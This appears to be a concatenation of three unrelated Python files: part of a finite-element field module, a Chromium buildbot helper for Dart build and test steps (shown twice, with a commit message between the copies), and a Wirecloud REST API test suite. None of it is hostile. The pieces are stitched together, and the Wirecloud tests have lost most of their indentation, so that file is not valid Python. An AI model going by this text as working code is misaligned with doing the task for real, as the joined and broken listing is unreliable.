           u_n = \sum_e (u_{e,avg} * volume_e) / \sum_e volume_e
               = \sum_e \int_{volume_e} u / \sum volume_e
        """
        region = self.region

        n_cells = region.get_n_cells()
        if n_cells != data_qp.shape[0]:
            msg = 'incompatible shape! (%d == %d)' % (n_cells,
                                                      data_qp.shape[0])
            raise ValueError(msg)

        n_vertex = self.n_vertex_dof
        nc = data_qp.shape[2]

        nod_vol = nm.zeros((n_vertex,), dtype=nm.float64)
        data_vertex = nm.zeros((n_vertex, nc), dtype=nm.float64)

        vg = self.get_mapping(self.region, integral, 'volume')[0]

        volume = nm.squeeze(vg.volume)
        iels = self.region.get_cells()

        # Per-element integrals of the data.
        data_e = nm.zeros((volume.shape[0], 1, nc, 1), dtype=nm.float64)
        vg.integrate(data_e, data_qp[iels])

        ir = nm.arange(nc, dtype=nm.int32)

        conn = self.econn[:, :self.gel.n_vertex]
        for ii, cc in enumerate(conn):
            # Assumes unique nodes in cc!
            ind2, ind1 = nm.meshgrid(ir, cc)
            data_vertex[ind1,ind2] += data_e[iels[ii],0,:,0]
            nod_vol[cc] += volume[ii]
        # Volume-weighted average.
        data_vertex /= nod_vol[:,nm.newaxis]

        return data_vertex
class SurfaceField(FEField):
    """
    Finite element field base class over surface (element dimension is one
    less than space dimension).
    """

    def _check_region(self, region):
        """
        Check whether the `region` can be used for the
        field.

        Returns
        -------
        ok : bool
            True if the region is usable for the field.
        """
        # The region must consist of facets and have at least one cell.
        ok1 = ((region.kind_tdim == (region.tdim - 1))
               and (region.get_n_cells(True) > 0))

        if not ok1:
            output('bad region topological dimension and kind! (%d, %s)'
                   % (region.tdim, region.kind))

        # All region facets must lie on the domain surface.
        n_ns = region.get_facet_indices().shape[0] - region.get_n_cells(True)
        ok2 = n_ns == 0
        if not ok2:
            output('%d region facets are not on the domain surface!' % n_ns)

        return ok1 and ok2

    def _setup_geometry(self):
        """
        Setup the field region geometry.
        """
        # Take the surface facet of the first volume geometry element.
        for key, vgel in six.iteritems(self.domain.geom_els):
            self.gel = vgel.surface_facet
            break

        if self.gel is None:
            raise ValueError('cells with no surface!')

        self.is_surface = True

    def _create_interpolant(self):
        # Unique name encoding geometry, space, basis, order and the
        # optional bubble function flag.
        name = '%s_%s_%s_%d%s' % (self.gel.name, self.space,
                                  self.poly_space_base, self.approx_order,
                                  'B' * self.force_bubble)
        ps = PolySpace.any_from_args(name, self.gel, self.approx_order,
                                     base=self.poly_space_base,
                                     force_bubble=self.force_bubble)
        self.poly_space = ps

    def setup_extra_data(self, geometry, info, is_trace):
        """
        Check and complete the surface data of the term given by `info`.
        """
        dct = info.dc_type.type
        if dct != 'surface':
            msg = "dof connectivity type must be 'surface'! (%s)" % dct
            raise ValueError(msg)

        reg = info.get_region()

        if reg.name not in self.surface_data:
            # Defined in setup_vertex_dofs()
            msg = 'no surface data of surface field! (%s)' % reg.name
            raise ValueError(msg)

        if reg.name in self.surface_data and is_trace:
            sd = self.surface_data[reg.name]
            mreg_name = info.get_region_name(can_trace=False)
            sd.setup_mirror_connectivity(reg, mreg_name)

    def _init_econn(self):
        """
        Initialize the extended DOF connectivity.
        """
        n_ep = self.poly_space.n_nod
        n_cell = self.region.get_n_cells(is_surface=self.is_surface)
        self.econn = nm.zeros((n_cell, n_ep), nm.int32)

    def _setup_vertex_dofs(self):
        """
        Setup vertex DOF connectivity.

        Returns
        -------
        n_dof : int
            The number of vertex DOFs.
        remap : array or None
            Mapping of mesh vertices to field-local DOF numbers, or None
            if the field has no vertex DOFs.
        """
        if self.node_desc.vertex is None:
            return 0, None

        region = self.region

        remap = prepare_remap(region.vertices, region.n_v_max)
        n_dof = region.vertices.shape[0]

        # Remap vertex node connectivity to field-local numbering.
        conn, gel = self.domain.get_conn(ret_gel=True)
        faces = gel.get_surface_entities()
        aux = FESurface('aux', region, faces, conn)
        self.econn[:, :aux.n_fp] = aux.leconn
        self.surface_data[region.name] = aux

        return n_dof, remap

    def _setup_bubble_dofs(self):
        """
        Setup bubble DOF connectivity.

        Surface fields have no bubble DOFs.
        """
        return 0, None, None

    def get_econn(self, conn_type, region, is_trace=False,
                  integration=None):
        """
        Get extended connectivity of the given type in the given region.
        """
        ct = conn_type.type if isinstance(conn_type, Struct) else conn_type

        if ct != 'surface':
            msg = 'connectivity type must be "surface"! (%s)' % ct
            raise ValueError(msg)

        sd = self.surface_data[region.name]
        conn = sd.get_connectivity(local=True, is_trace=is_trace)

        return conn

    def average_qp_to_vertices(self, data_qp, integral):
        r"""
        Average data given in quadrature points in region elements into
        region vertices.

        .. math::
           u_n = \sum_e (u_{e,avg} * area_e) / \sum_e area_e
               = \sum_e \int_{area_e} u / \sum area_e
        """
        region = self.region

        n_cells = region.get_n_cells(True)
        if n_cells != data_qp.shape[0]:
            msg = 'incompatible shape! (%d == %d)' % (n_cells,
                                                      data_qp.shape[0])
            raise ValueError(msg)

        n_vertex = len(region.vertices)
        nc = data_qp.shape[2]

        nod_vol = nm.zeros((n_vertex,), dtype=nm.float64)
        data_vertex = nm.zeros((n_vertex, nc), dtype=nm.float64)

        sg = self.get_mapping(self.region, integral, 'surface')[0]

        area = nm.squeeze(sg.volume)
        iels = nm.arange(n_cells, dtype=nm.int32)

        # Per-element integrals of the data.
        data_e = nm.zeros((area.shape[0], 1, nc, 1), dtype=nm.float64)
        sg.integrate(data_e, data_qp[iels])

        ir = nm.arange(nc, dtype=nm.int32)

        sd = self.domain.surface_groups[region.name]
        # Should be vertex connectivity!
        conn = sd.get_connectivity(local=True)
        for ii, cc in enumerate(conn):
            # Assumes unique nodes in cc!
            ind2, ind1 = nm.meshgrid(ir, cc)
            data_vertex[ind1,ind2] += data_e[iels[ii],0,:,0]
            nod_vol[cc] += area[ii]
        # Area-weighted average.
        data_vertex /= nod_vol[:,nm.newaxis]

        return data_vertex
class H1Mixin(Struct):
    """
    Methods of fields specific to H1 space.
    """

    def _setup_shape(self):
        """
        Setup the field's shape-related attributes, see :class:`Field`.
        """
        # For H1 fields the DOF value shape is the field shape itself and
        # the number of components is its product.
        self.val_shape = self.shape
        self.n_components = nm.prod(self.val_shape)
|
#!/usr/bin/python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Set of utilities to add commands to a buildbot factory.
Contains the Dart specific commands. Based on commands.py
"""
from buildbot.steps import shell
from buildbot.process.properties import WithProperties
from master import chromium_step
from master.factory import commands
class DartCommands(commands.FactoryCommands):
  """Encapsulates methods to add dart commands to a buildbot factory."""

  # Extra log files collected from every test step.
  logfiles = {
      "flakylog": ".flaky.log",
      "debuglog": ".debug.log",
      "testoutcomelog": ".test-outcome.log",
  }

  # Flags passed to every test.py invocation.
  standard_flags = "--write-debug-log --write-test-outcome-log"

  def __init__(self, factory=None, target=None, build_dir=None,
               target_platform=None, env=None):
    commands.FactoryCommands.__init__(self, factory, target, build_dir,
                                      target_platform)

    # Two additional directories up compared to normal chromium scripts due
    # to using runtime as runtime dir inside dart directory inside
    # build directory.
    self._script_dir = self.PathJoin('..', self._script_dir)
    self._tools_dir = self.PathJoin('tools')

    # Where the chromium slave scripts are.
    self._chromium_script_dir = self.PathJoin(self._script_dir, 'chromium')
    self._private_script_dir = self.PathJoin(self._script_dir, '..', 'private')
    self._slave_dir = self.PathJoin(self._script_dir,
                                    '..', '..', '..',
                                    'build', 'scripts',
                                    'slave', 'dart')
    self._dart_util = self.PathJoin(self._slave_dir, 'dart_util.py')
    self._dart_build_dir = self.PathJoin('build', 'dart')
    self._repository_root = ''
    self._custom_env = env or {}

  def AddMaybeClobberStep(self, clobber, options=None, timeout=1200):
    """Possibly clobber.

    Either clobber unconditionally (e.g. nuke-and-pave builder, set at
    factory build time), or at runtime (clobber checkbox). If the
    former, the clobber arg is set. If the latter, we use a buildbot
    Properties object.

    TODO(jrg); convert into a doStepIf with a closure referencing
    step.build.getProperties(). E.g.
    http://permalink.gmane.org/gmane.comp.python.buildbot.devel/6039
    """
    options = options or {}
    clobber_cmd = [self._python, self._dart_util]
    # '--clobber' is only appended when the 'clobber' build property is set.
    clobber_cmd.append(WithProperties('%(clobber:+--clobber)s'))
    workdir = self._dart_build_dir
    self._factory.addStep(shell.ShellCommand,
                          name='maybe clobber',
                          description='maybe clobber',
                          timeout=timeout,
                          haltOnFailure=True,
                          workdir=workdir,
                          command=clobber_cmd)

  # pylint: disable=W0221
  def AddCompileStep(self, options=None, timeout=1200):
    """Add a build step; the build target is chosen from the builder name."""
    options = options or {}
    cmd = 'python ' + self._tools_dir + '/build.py --mode=%s' % \
        (options['mode'])
    workdir = self._dart_build_dir
    # Classify the builder once from its name prefix ('' when unset).
    name = options.get('name') or ''
    is_dartc = name.startswith('dartc')
    is_dart2dart = name.startswith('dart2dart')
    is_new_analyzer = name.startswith('new_analyzer')
    is_analyzer_experimental = name.startswith('analyzer_experimental')
    is_vm = not (is_dartc or is_dart2dart or is_new_analyzer or
                 is_analyzer_experimental)
    if is_vm:
      cmd += ' --arch=%s' % (options['arch'])
      cmd += ' runtime'
    elif is_dart2dart:
      cmd += ' dart2dart_bot'
    elif is_dartc and options['mode'] == 'debug':
      # For dartc we always do a full build, except for debug mode
      # where we will time out doing api docs.
      cmd += ' dartc_bot'
    else:
      # We don't specify a specific target (i.e. we build the all target)
      pass
    self._factory.addStep(shell.ShellCommand,
                          name='build',
                          description='build',
                          timeout=timeout,
                          env=self._custom_env,
                          haltOnFailure=True,
                          workdir=workdir,
                          command=cmd)

  def AddKillStep(self, step_name='Kill leftover process'):
    """Kill processes (including browsers) left over by previous steps."""
    cmd = 'python ' + self._tools_dir + '/task_kill.py --kill_browsers=True'
    self._factory.addStep(shell.ShellCommand,
                          name='Taskkill',
                          description=step_name,
                          env=self._custom_env,
                          haltOnFailure=False,
                          workdir=self._dart_build_dir,
                          command=cmd)

  def AddArchiveCoredumps(self, options=None, step_name='Archive coredumps'):
    """Archive core dumps; only added on VM builders."""
    options = options or {}
    name = options.get('name') or ''
    if name.startswith('vm'):
      cmd = 'python ' + self._tools_dir + '/archive_crash.py'
      self._factory.addStep(shell.ShellCommand,
                            name='ArchiveCore',
                            description=step_name,
                            env=self._custom_env,
                            haltOnFailure=False,
                            workdir=self._dart_build_dir,
                            command=cmd)

  def AddAnalyzerTests(self, options, name, timeout):
    """Add a test step running an analyzer over the test suites."""
    compiler = 'dartanalyzer'
    if name.startswith('analyzer_experimental'):
      compiler = 'dart2analyzer'
    cmd = ('python ' + self._tools_dir + '/test.py '
           ' --progress=line --report --time --mode=%s --arch=%s '
           ' --compiler=%s --runtime=none --failure-summary %s'
           ) % (options['mode'], options['arch'], compiler,
                self.standard_flags)
    self._factory.addStep(shell.ShellCommand,
                          name='tests',
                          description='tests',
                          timeout=timeout,
                          env=self._custom_env,
                          haltOnFailure=False,
                          workdir=self._dart_build_dir,
                          command=cmd,
                          logfiles=self.logfiles,
                          lazylogfiles=True)

  def AddDart2dartTests(self, options, timeout):
    """Add normal and minified dart2dart test steps."""
    shards = options.get('shards') or 1
    shard = options.get('shard') or 1
    cmd = ('python ' + self._tools_dir + '/test.py '
           ' --progress=buildbot --report --time --mode=%s --arch=%s '
           ' --compiler=dart2dart --shards=%s --shard=%s %s'
           ) % (options['mode'], options['arch'], shards, shard,
                self.standard_flags)
    self._factory.addStep(shell.ShellCommand,
                          name='tests',
                          description='tests',
                          timeout=timeout,
                          env=self._custom_env,
                          haltOnFailure=False,
                          workdir=self._dart_build_dir,
                          command=cmd,
                          logfiles=self.logfiles,
                          lazylogfiles=True)
    # Run the same suite again with minification enabled.
    cmd += ' --minified'
    self._factory.addStep(shell.ShellCommand,
                          name='minified tests',
                          description='minified tests',
                          timeout=timeout,
                          env=self._custom_env,
                          haltOnFailure=False,
                          workdir=self._dart_build_dir,
                          command=cmd,
                          logfiles=self.logfiles,
                          lazylogfiles=True)

  def AddVMTests(self, options, timeout):
    """Add VM test steps in unchecked and/or checked configurations."""
    cmd = ('python ' + self._tools_dir + '/test.py '
           ' --progress=line --report --time --mode=%s --arch=%s '
           '--compiler=none --runtime=vm --failure-summary %s '
           '--copy-coredumps'
           ) % (options['mode'], options['arch'], self.standard_flags)
    vm_options = options.get('vm_options')
    if vm_options:
      cmd += ' --vm-options=%s' % vm_options
    flags = options.get('flags')
    if flags is not None:
      cmd += flags
    # The 'checked_config' key may be present in the map with a value of
    # None, so dict.get()'s default (which only applies when the key is
    # missing) cannot be used here.
    checked_config = options.get('checked_config') or 'both'
    if checked_config in ('unchecked', 'both'):
      self._factory.addStep(shell.ShellCommand,
                            name='tests',
                            description='tests',
                            timeout=timeout,
                            env=self._custom_env,
                            haltOnFailure=False,
                            workdir=self._dart_build_dir,
                            command=cmd,
                            logfiles=self.logfiles,
                            lazylogfiles=True)
    if checked_config in ('checked', 'both'):
      cmd += ' --checked'
      self._factory.addStep(shell.ShellCommand,
                            name='checked_tests',
                            description='checked_tests',
                            timeout=timeout,
                            env=self._custom_env,
                            haltOnFailure=False,
                            workdir=self._dart_build_dir,
                            command=cmd,
                            logfiles=self.logfiles,
                            lazylogfiles=True)

  def AddTests(self, options=None, timeout=1200, channel=None):
    """Dispatch to the test steps matching the builder name."""
    options = options or {}
    name = options.get('name') or ''
    is_dart2dart = name.startswith('dart2dart')
    is_analyzer = (name.startswith('new_analyzer') or
                   name.startswith('analyzer_experimental'))
    if is_analyzer:
      self.AddAnalyzerTests(options, name, timeout)
    elif is_dart2dart:
      self.AddDart2dartTests(options, timeout)
    else:
      self.AddVMTests(options, timeout)

  def AddAnnotatedSteps(self, python_script, timeout=1200, run=1):
    """Run an annotated-steps script; `run` numbers repeated invocations."""
    name = 'annotated_steps'
    env = dict(self._custom_env)
    env['BUILDBOT_ANNOTATED_STEPS_RUN'] = '%d' % run
    if run > 1:
      name = name + '_run%d' % run
    self._factory.addStep(chromium_step.AnnotatedCommand,
                          name=name,
                          description=name,
                          timeout=timeout,
                          haltOnFailure=False,
                          env=env,
                          workdir=self._dart_build_dir,
                          command=[self._python, python_script],
                          logfiles=self.logfiles,
                          lazylogfiles=True)

  def AddTrigger(self, trigger):
    """Add a pre-built trigger step to the factory."""
    self._factory.addStep(trigger)
Fix the checked mode config when its value is None

The 'checked_config' key is actually added to the options map with a value of None, so we cannot rely on a default value passed to get() here — the default only applies when the key is missing entirely.

Review URL: https://codereview.chromium.org/248153005

git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@265641 0039d316-1c4b-4281-b951-d872f2087c98
#!/usr/bin/python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Set of utilities to add commands to a buildbot factory.
Contains the Dart specific commands. Based on commands.py
"""
from buildbot.steps import shell
from buildbot.process.properties import WithProperties
from master import chromium_step
from master.factory import commands
class DartCommands(commands.FactoryCommands):
  """Encapsulates methods to add dart commands to a buildbot factory."""

  # Extra log files collected from every test step.
  logfiles = {
      "flakylog": ".flaky.log",
      "debuglog": ".debug.log",
      "testoutcomelog": ".test-outcome.log",
  }

  # Flags passed to every test.py invocation.
  standard_flags = "--write-debug-log --write-test-outcome-log"

  def __init__(self, factory=None, target=None, build_dir=None,
               target_platform=None, env=None):
    commands.FactoryCommands.__init__(self, factory, target, build_dir,
                                      target_platform)

    # Two additional directories up compared to normal chromium scripts due
    # to using runtime as runtime dir inside dart directory inside
    # build directory.
    self._script_dir = self.PathJoin('..', self._script_dir)
    self._tools_dir = self.PathJoin('tools')

    # Where the chromium slave scripts are.
    self._chromium_script_dir = self.PathJoin(self._script_dir, 'chromium')
    self._private_script_dir = self.PathJoin(self._script_dir, '..', 'private')
    self._slave_dir = self.PathJoin(self._script_dir,
                                    '..', '..', '..',
                                    'build', 'scripts',
                                    'slave', 'dart')
    self._dart_util = self.PathJoin(self._slave_dir, 'dart_util.py')
    self._dart_build_dir = self.PathJoin('build', 'dart')
    self._repository_root = ''
    self._custom_env = env or {}

  def AddMaybeClobberStep(self, clobber, options=None, timeout=1200):
    """Possibly clobber.

    Either clobber unconditionally (e.g. nuke-and-pave builder, set at
    factory build time), or at runtime (clobber checkbox). If the
    former, the clobber arg is set. If the latter, we use a buildbot
    Properties object.

    TODO(jrg); convert into a doStepIf with a closure referencing
    step.build.getProperties(). E.g.
    http://permalink.gmane.org/gmane.comp.python.buildbot.devel/6039
    """
    options = options or {}
    clobber_cmd = [self._python, self._dart_util]
    # '--clobber' is only appended when the 'clobber' build property is set.
    clobber_cmd.append(WithProperties('%(clobber:+--clobber)s'))
    workdir = self._dart_build_dir
    self._factory.addStep(shell.ShellCommand,
                          name='maybe clobber',
                          description='maybe clobber',
                          timeout=timeout,
                          haltOnFailure=True,
                          workdir=workdir,
                          command=clobber_cmd)

  # pylint: disable=W0221
  def AddCompileStep(self, options=None, timeout=1200):
    """Add a build step; the build target is chosen from the builder name."""
    options = options or {}
    cmd = 'python ' + self._tools_dir + '/build.py --mode=%s' % \
        (options['mode'])
    workdir = self._dart_build_dir
    # Classify the builder once from its name prefix ('' when unset).
    name = options.get('name') or ''
    is_dartc = name.startswith('dartc')
    is_dart2dart = name.startswith('dart2dart')
    is_new_analyzer = name.startswith('new_analyzer')
    is_analyzer_experimental = name.startswith('analyzer_experimental')
    is_vm = not (is_dartc or is_dart2dart or is_new_analyzer or
                 is_analyzer_experimental)
    if is_vm:
      cmd += ' --arch=%s' % (options['arch'])
      cmd += ' runtime'
    elif is_dart2dart:
      cmd += ' dart2dart_bot'
    elif is_dartc and options['mode'] == 'debug':
      # For dartc we always do a full build, except for debug mode
      # where we will time out doing api docs.
      cmd += ' dartc_bot'
    else:
      # We don't specify a specific target (i.e. we build the all target)
      pass
    self._factory.addStep(shell.ShellCommand,
                          name='build',
                          description='build',
                          timeout=timeout,
                          env=self._custom_env,
                          haltOnFailure=True,
                          workdir=workdir,
                          command=cmd)

  def AddKillStep(self, step_name='Kill leftover process'):
    """Kill processes (including browsers) left over by previous steps."""
    cmd = 'python ' + self._tools_dir + '/task_kill.py --kill_browsers=True'
    self._factory.addStep(shell.ShellCommand,
                          name='Taskkill',
                          description=step_name,
                          env=self._custom_env,
                          haltOnFailure=False,
                          workdir=self._dart_build_dir,
                          command=cmd)

  def AddArchiveCoredumps(self, options=None, step_name='Archive coredumps'):
    """Archive core dumps; only added on VM builders."""
    options = options or {}
    name = options.get('name') or ''
    if name.startswith('vm'):
      cmd = 'python ' + self._tools_dir + '/archive_crash.py'
      self._factory.addStep(shell.ShellCommand,
                            name='ArchiveCore',
                            description=step_name,
                            env=self._custom_env,
                            haltOnFailure=False,
                            workdir=self._dart_build_dir,
                            command=cmd)

  def AddAnalyzerTests(self, options, name, timeout):
    """Add a test step running an analyzer over the test suites."""
    compiler = 'dartanalyzer'
    if name.startswith('analyzer_experimental'):
      compiler = 'dart2analyzer'
    cmd = ('python ' + self._tools_dir + '/test.py '
           ' --progress=line --report --time --mode=%s --arch=%s '
           ' --compiler=%s --runtime=none --failure-summary %s'
           ) % (options['mode'], options['arch'], compiler,
                self.standard_flags)
    self._factory.addStep(shell.ShellCommand,
                          name='tests',
                          description='tests',
                          timeout=timeout,
                          env=self._custom_env,
                          haltOnFailure=False,
                          workdir=self._dart_build_dir,
                          command=cmd,
                          logfiles=self.logfiles,
                          lazylogfiles=True)

  def AddDart2dartTests(self, options, timeout):
    """Add normal and minified dart2dart test steps."""
    shards = options.get('shards') or 1
    shard = options.get('shard') or 1
    cmd = ('python ' + self._tools_dir + '/test.py '
           ' --progress=buildbot --report --time --mode=%s --arch=%s '
           ' --compiler=dart2dart --shards=%s --shard=%s %s'
           ) % (options['mode'], options['arch'], shards, shard,
                self.standard_flags)
    self._factory.addStep(shell.ShellCommand,
                          name='tests',
                          description='tests',
                          timeout=timeout,
                          env=self._custom_env,
                          haltOnFailure=False,
                          workdir=self._dart_build_dir,
                          command=cmd,
                          logfiles=self.logfiles,
                          lazylogfiles=True)
    # Run the same suite again with minification enabled.
    cmd += ' --minified'
    self._factory.addStep(shell.ShellCommand,
                          name='minified tests',
                          description='minified tests',
                          timeout=timeout,
                          env=self._custom_env,
                          haltOnFailure=False,
                          workdir=self._dart_build_dir,
                          command=cmd,
                          logfiles=self.logfiles,
                          lazylogfiles=True)

  def AddVMTests(self, options, timeout):
    """Add VM test steps in unchecked and/or checked configurations."""
    cmd = ('python ' + self._tools_dir + '/test.py '
           ' --progress=line --report --time --mode=%s --arch=%s '
           '--compiler=none --runtime=vm --failure-summary %s '
           '--copy-coredumps'
           ) % (options['mode'], options['arch'], self.standard_flags)
    vm_options = options.get('vm_options')
    if vm_options:
      cmd += ' --vm-options=%s' % vm_options
    flags = options.get('flags')
    if flags is not None:
      cmd += flags
    # The 'checked_config' key may be present in the map with a value of
    # None, so dict.get()'s default (which only applies when the key is
    # missing) cannot be used here.
    checked_config = options.get('checked_config') or 'both'
    if checked_config in ('unchecked', 'both'):
      self._factory.addStep(shell.ShellCommand,
                            name='tests',
                            description='tests',
                            timeout=timeout,
                            env=self._custom_env,
                            haltOnFailure=False,
                            workdir=self._dart_build_dir,
                            command=cmd,
                            logfiles=self.logfiles,
                            lazylogfiles=True)
    if checked_config in ('checked', 'both'):
      cmd += ' --checked'
      self._factory.addStep(shell.ShellCommand,
                            name='checked_tests',
                            description='checked_tests',
                            timeout=timeout,
                            env=self._custom_env,
                            haltOnFailure=False,
                            workdir=self._dart_build_dir,
                            command=cmd,
                            logfiles=self.logfiles,
                            lazylogfiles=True)

  def AddTests(self, options=None, timeout=1200, channel=None):
    """Dispatch to the test steps matching the builder name."""
    options = options or {}
    name = options.get('name') or ''
    is_dart2dart = name.startswith('dart2dart')
    is_analyzer = (name.startswith('new_analyzer') or
                   name.startswith('analyzer_experimental'))
    if is_analyzer:
      self.AddAnalyzerTests(options, name, timeout)
    elif is_dart2dart:
      self.AddDart2dartTests(options, timeout)
    else:
      self.AddVMTests(options, timeout)

  def AddAnnotatedSteps(self, python_script, timeout=1200, run=1):
    """Run an annotated-steps script; `run` numbers repeated invocations."""
    name = 'annotated_steps'
    env = dict(self._custom_env)
    env['BUILDBOT_ANNOTATED_STEPS_RUN'] = '%d' % run
    if run > 1:
      name = name + '_run%d' % run
    self._factory.addStep(chromium_step.AnnotatedCommand,
                          name=name,
                          description=name,
                          timeout=timeout,
                          haltOnFailure=False,
                          env=env,
                          workdir=self._dart_build_dir,
                          command=[self._python, python_script],
                          logfiles=self.logfiles,
                          lazylogfiles=True)

  def AddTrigger(self, trigger):
    """Add a pre-built trigger step to the factory."""
    self._factory.addStep(trigger)
|
# -*- coding: utf-8 -*-
# Copyright 2013 Universidad Politécnica de Madrid
# This file is part of Wirecloud.
# Wirecloud is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Wirecloud is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Wirecloud. If not, see <http://www.gnu.org/licenses/>.
import os
from tempfile import mkdtemp
import shutil
from django.core.urlresolvers import reverse
from django.test import Client
from django.utils import simplejson
from wirecloud.catalogue import utils as catalogue
from wirecloud.catalogue.models import CatalogueResource
import wirecloud.commons.test
from wirecloud.commons.test import LocalDownloader, WirecloudTestCase
from wirecloud.commons.utils import downloader
from wirecloud.commons.utils.wgt import WgtDeployer
from wirecloud.platform.models import IWidget, Tab, VariableValue, Workspace
from wirecloud.platform.widget import utils as showcase
# Avoid nose to repeat these tests (they are run through wirecloud/platform/tests/__init__.py)
__test__ = False
class ApplicationMashupAPI(WirecloudTestCase):
fixtures = ('selenium_test_data', 'user_with_workspaces')
tags = ('rest_api')
    @classmethod
    def setUpClass(cls):
        # One shared test client for all tests in this class.
        super(ApplicationMashupAPI, cls).setUpClass()
        cls.client = Client()
        # Replace the HTTP downloader with a stub serving files from the
        # local test-data directory, so tests never touch the network;
        # restored in tearDownClass().
        cls._original_download_function = staticmethod(downloader.download_http_content)
        downloader.download_http_content = LocalDownloader({
            'http': {
                'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
            },
        })
    @classmethod
    def tearDownClass(cls):
        # Restore the real downloader monkeypatched in setUpClass().
        # NOTE(review): no super().tearDownClass() call here — confirm the
        # base class does not need one.
        downloader.download_http_content = cls._original_download_function
def test_features(self):
url = reverse('wirecloud.features')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_workspace_collection_read_requires_authentication(self):
url = reverse('wirecloud.workspace_collection')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_workspace_collection_read(self):
url = reverse('wirecloud.workspace_collection')
self.client.login(username='admin', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, list))
self.assertTrue(isinstance(response_data[0], dict))
def test_workspace_collection_post_requires_authentication(self):
url = reverse('wirecloud.workspace_collection')
data = {
'name': 'test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not created
self.assertFalse(Workspace.objects.filter(name='test').exists())
# Check using Accept: text/html
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_collection_post(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
data = {
'name': 'test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'test')
self.assertTrue(isinstance(response_data['wiring'], dict))
# Workspace should be created
self.assertTrue(Workspace.objects.filter(creator=1, name='test').exists())
def test_workspace_collection_post_conflict(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'ExistingWorkspace',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 409)
def test_workspace_collection_post_creation_from_nonexistent_mashup(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/nonexistent-mashup/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 422)
def test_workspace_collection_post_creation_from_mashup(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/test-mashup/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'Test Mashup')
self.assertTrue(isinstance(response_data['wiring'], dict))
# Workspace should be created
self.assertTrue(Workspace.objects.filter(creator=2, name='Test Mashup').exists())
def test_workspace_collection_post_creation_from_mashup_missing_dependencies(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/test-mashup-dependencies/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 422)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('description' in response_data)
self.assertTrue('details' in response_data)
self.assertTrue('missingDependencies' in response_data['details'])
self.assertEqual(set(response_data['details']['missingDependencies']), set((
'Wirecloud/nonavailable-operator/1.0',
'Wirecloud/nonavailable-widget/1.0',
)))
# Workspace should not be created
self.assertFalse(Workspace.objects.filter(creator=2, name='Test Mashup').exists())
def test_workspace_entry_read_requires_authentication(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not deleted
self.assertTrue(Workspace.objects.filter(name='ExistingWorkspace').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_entry_read(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
# Response should be a dict
